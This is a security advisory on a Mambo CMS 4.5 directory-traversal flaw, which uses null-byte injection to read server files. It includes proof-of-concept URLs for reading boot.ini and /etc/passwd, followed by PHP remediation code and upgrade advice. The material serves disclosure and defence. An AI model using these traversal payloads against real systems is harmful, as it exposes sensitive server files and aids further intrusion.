Mambo CMS vulnerable to a remote file downloading attack

Vulnerability found:

11 March 2005

Severity level:

Low

Credits:

Gemma Hughes of ProCheckUp Ltd

Description:

Mambo CMS is vulnerable to a remote file downloading attack when it is installed on a server with a badly configured PHP installation. This could allow an attacker to gain access to sensitive information about the server that is hosting the Mambo CMS-managed site. The vulnerability is only exploitable where magic_quotes_gpc is set to 'Off' in the server's PHP configuration. It should be noted that this configuration is specifically warned against during the installation of Mambo CMS, so sites configured in a way that allows this exploit are likely to be uncommon.
The exploit works because of the null character attached to the end of the query string, which stops further execution of the program once the contents of the requested file have been echoed to the screen.

Consequences:

An attacker could obtain confidential information that may aid a further attack.

Notes:

The risk associated with this vulnerability is low, because the number of servers with a configuration allowing this kind of exploit is likely to be low. In the default php.ini-dist file included in PHP distributions, magic_quotes_gpc is set to On, and this problem will not be encountered. However, for reasons of performance, the php.ini-recommended file sets magic_quotes_gpc to Off, and this configuration may be in use on many servers.

This advisory has been published following consultation with UK NISCC

Vulnerable:

Tested with Mambo 4.5 (1.0.3) running on Windows 2000 and Linux systems. Other versions may be affected, but this has not been verified. Mambo was tested on PHP 4.3.10.


Proof of concept:

Proof of concept for Windows servers:

http://target/index2.php?no_html=1&option=../../../../../../../../../../../../../../../../../../boot.ini%00

Result: The contents of boot.ini are echoed to the client.

Proof of concept for Linux servers:

http://target/index2.php?no_html=1&option=../../../../../../../../../../../../../../../../../../etc/passwd%00

Result: The contents of /etc/passwd are echoed to the client.


How to fix:

Ensure that all inputs are filtered before they are used to build a file path, rejecting the '../' sequences that allow directory traversal as well as null characters. Enable magic_quotes_gpc within PHP.
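As an added illustration of the fix (example code written for this advisory, not Mambo's own source), the following shows the unsafe include pattern described above beside a hardened version that validates the option parameter before it touches the file system. The components directory layout, the function names and the '.php' suffix are assumptions.

```php
<?php
// Added example: illustrative code, not Mambo's own source.
// Assumed layout: component scripts live in ./components/<name>.php
$components_dir = __DIR__ . '/components';

// UNSAFE: the request parameter is spliced straight into an include path.
// With magic_quotes_gpc=Off a literal %00 reaches PHP unescaped, and on the
// PHP 4 line the null byte terminates the file name, so the '.php' suffix
// appended here is silently dropped and any readable file can be included.
function load_component_unsafe($option) {
    global $components_dir;
    include $components_dir . '/' . $option . '.php';
}

// HARDENED: accept only a strict whitelist of characters, so neither '../'
// nor a null byte can ever form part of the path, and then confirm that the
// resolved file still lies inside the components directory. This check does
// not depend on magic_quotes_gpc, so it holds on either PHP configuration.
function is_valid_option($option) {
    // Assumed naming rule: lowercase letters, digits and underscores only.
    return is_string($option) && preg_match('/^[a-z0-9_]{1,32}$/', $option) === 1;
}

function load_component_safe($option) {
    global $components_dir;
    if (!is_valid_option($option)) {
        return false;                       // rejects '../', NUL, empty, etc.
    }
    $base = realpath($components_dir);
    $path = realpath($components_dir . '/' . $option . '.php');
    // realpath() returns false for a missing file; the prefix comparison
    // catches anything that still resolved outside $base (e.g. a symlink).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Request handling: the value comes straight from the query string, exactly
// as in the proof of concept, and is refused unless it passes validation.
$option = isset($_GET['option']) ? $_GET['option'] : '';
if (!load_component_safe($option)) {
    header('HTTP/1.0 400 Bad Request');
    echo 'Invalid option';
}
```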
The security advice from Mambo is as follows:
Anyone running 4.5 (1.0.x) should certainly upgrade to 4.5 (1.0.9 plus security fix) immediately, or make an immediate jump to 4.5.2.3 (the current release).

Anyone running 4.5 (1.0.9 plus security fix) may wish to upgrade to 4.5.2.3 in order to run the latest plugins and to have the latest stable version.

Anyone running 4.5.1 or above is advised to move to 4.5.2.3 or to install 4.5.3 when it is released.

Legal:

Copyright 2005 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.